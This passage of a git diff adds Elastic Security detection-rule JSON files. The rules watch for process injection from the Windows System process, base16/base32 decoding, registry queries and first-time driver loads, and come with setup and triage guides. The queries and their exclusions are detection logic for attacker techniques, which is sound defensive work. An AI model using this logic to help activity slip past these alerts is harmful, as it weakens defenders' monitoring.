"ddab1f5f-7089-44f5-9fda-de5b11322e77_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109.json new file mode 100644 index 00000000000..29420415103 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious child process of the Windows virtual system process, which could indicate code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process from a System Virtual Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.pid == 4 and process.executable : \"?*\" and\n not process.executable : (\"Registry\", \"MemCompression\", \"?:\\\\Windows\\\\System32\\\\smss.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110.json new file mode 100644 index 00000000000..c78a5a92ec9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious child process of the Windows virtual system process, which could indicate code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process from a System Virtual Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.pid == 4 and process.executable : \"?*\" and\n not process.executable : (\"Registry\", \"MemCompression\", \"?:\\\\Windows\\\\System32\\\\smss.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_108.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_108.json new file mode 100644 index 00000000000..ae1e2297d3f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_108.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls.", + "false_positives": [ + "Automated tools such as Jenkins may encode or decode files as part of their normal behavior. These events can be filtered by the process executable or username values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Base16 or Base32 Encoding/Decoding Activity", + "query": "process where host.os.type == \"linux\" and event.type in (\"start\", \"process_started\") and\nprocess.name in (\"base16\", \"base32\", \"base32plain\", \"base32hex\") and not process.args in (\"--help\", \"--version\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "debff20a-46bc-4a4d-bae5-5cdd14222795_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_109.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_109.json new file mode 100644 index 00000000000..6313be6e764 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_109.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls.", + "false_positives": [ + "Automated tools such as Jenkins may encode or decode files as part of their normal behavior. These events can be filtered by the process executable or username values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Base16 or Base32 Encoding/Decoding Activity", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name in (\"base16\", \"base32\", \"base32plain\", \"base32hex\") and\nnot process.args in (\"--help\", \"--version\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "debff20a-46bc-4a4d-bae5-5cdd14222795_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_110.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_110.json new file mode 100644 index 00000000000..a0a83f5df4a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_110.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls.", + "false_positives": [ + "Automated tools such as Jenkins may encode or decode files as part of their normal behavior. These events can be filtered by the process executable or username values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Base16 or Base32 Encoding/Decoding Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"base16\", \"base32\", \"base32plain\", \"base32hex\") and\nnot process.args in (\"--help\", \"--version\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "debff20a-46bc-4a4d-bae5-5cdd14222795_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_104.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_104.json new file mode 100644 index 00000000000..d4912b0c48e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_104.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule identifies the execution of commands that can be used to query the Windows Registry. Adversaries may query the registry to gain situational awareness about the host, like installed security software, programs and settings.", + "from": "now-24h", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.process-*" + ], + "interval": "24h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Query Registry using Built-in Tools", + "new_terms_fields": [ + "host.id", + "user.id" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and\n (\n (process.name.caseless:\"reg.exe\" and process.args:\"query\") or\n (process.name.caseless:(\"powershell.exe\" or \"powershell_ise.exe\" or \"pwsh.exe\") and\n process.args:(\n (\"get-childitem\" or \"Get-ChildItem\" or \"gci\" or \"dir\" or \"ls\" or\n \"get-item\" or \"Get-Item\" or \"gi\" or\n \"get-itemproperty\" or \"Get-ItemProperty\" or \"gp\") and\n (\"hkcu\" or \"HKCU\" or \"hkey_current_user\" or \"HKEY_CURRENT_USER\" or\n \"hkey_local_machine\" or \"HKEY_LOCAL_MACHINE\" or\n \"hklm\" or \"HKLM\" or registry\\:\\:*)\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "ded09d02-0137-4ccc-8005-c45e617e8d4c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 104 + }, + "id": "ded09d02-0137-4ccc-8005-c45e617e8d4c_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_7.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_7.json new file mode 100644 index 00000000000..741de6d00d5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_7.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.", + "from": "now-9m", + "history_window_start": "now-30d", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Driver Loaded", + "new_terms_fields": [ + "dll.pe.original_file_name", + "dll.code_signature.subject_name" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", + "references": [ + "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df0fd41e-5590-4965-ad5e-cd079ec22fa9", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": 